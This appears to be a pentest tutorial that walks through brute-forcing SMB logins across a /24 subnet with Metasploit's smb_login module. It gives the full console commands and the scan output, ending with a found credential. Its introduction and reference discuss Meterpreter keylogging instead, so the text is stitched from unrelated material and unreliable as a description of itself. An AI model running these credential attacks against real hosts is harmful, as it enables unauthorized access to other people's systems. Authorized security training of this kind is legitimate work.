SMB Login Bruteforce

Introduction

Gaining access to credentials is a vital phase in penetration testing, and Meterpreter offers numerous functionalities facilitating attackers in extracting sensitive information. One notable capability is its integrated keylogger, which captures and records keystrokes.

Step-by-Step Guide

1. Open msfconsole

2. Use SMB login module 

msf6 > use auxiliary/scanner/smb/smb_login

3. Configure the needed options 

msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accept
                                                 ed: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-m
                                                 etasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair
                                                  per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser user
SMBUser => user
msf6 auxiliary(scanner/smb/smb_login) > set SMBPass password
SMBPass => password

4. Run then check the output 

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.0.0:445       - 192.168.0.0:445 - Starting SMB login bruteforce
[*] 192.168.0.1:445       - 192.168.0.1:445 - Starting SMB login bruteforce
[*] 192.168.0.2:445       - 192.168.0.2:445 - Starting SMB login bruteforce
[*] 192.168.0.3:445       - 192.168.0.3:445 - Starting SMB login bruteforce
[*] 192.168.0.4:445       - 192.168.0.4:445 - Starting SMB login bruteforce
[*] 192.168.0.5:445       - 192.168.0.5:445 - Starting SMB login bruteforce
[*] 192.168.0.6:445       - 192.168.0.6:445 - Starting SMB login bruteforce
[*] 192.168.0.7:445       - 192.168.0.7:445 - Starting SMB login bruteforce
[*] 192.168.0.8:445       - 192.168.0.8:445 - Starting SMB login bruteforce
[*] 192.168.0.9:445       - 192.168.0.9:445 - Starting SMB login bruteforce
...
[!] 192.168.0.144:445     - No active DB -- Credential data will not be saved!
[-] 192.168.0.168:445     - 192.168.0.168:445 - Could not connect
[!] 192.168.0.168:445     - No active DB -- Credential data will not be saved!
[+] 192.168.0.166:445     - 192.168.0.166:445 - Success: '.\user:password'
[!] 192.168.0.166:445     - No active DB -- Credential data will not be saved!
[*] 192.168.0.178:445     - 192.168.0.178:445 - Starting SMB login bruteforce
[*] 192.168.0.179:445     - 192.168.0.179:445 - Starting SMB login bruteforce
[*] 192.168.0.180:445     - 192.168.0.180:445 - Starting SMB login bruteforce
[*] 192.168.0.181:445     - 192.168.0.181:445 - Starting SMB login bruteforce
...
[-] 192.168.0.245:445     - 192.168.0.245:445 - Could not connect
[!] 192.168.0.245:445     - No active DB -- Credential data will not be saved!
[-] 192.168.0.255:445     - 192.168.0.255:445 - Could not connect
[!] 192.168.0.255:445     - No active DB -- Credential data will not be saved!
[*] 192.168.0.0/24:445    - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Successful on 192.168.0.166:445 with user:password credentials.

Video Demonstration

Reference

https://www.offsec.com/metasploit-unleashed/keylogging/#using-a-keylogger-with-metasploit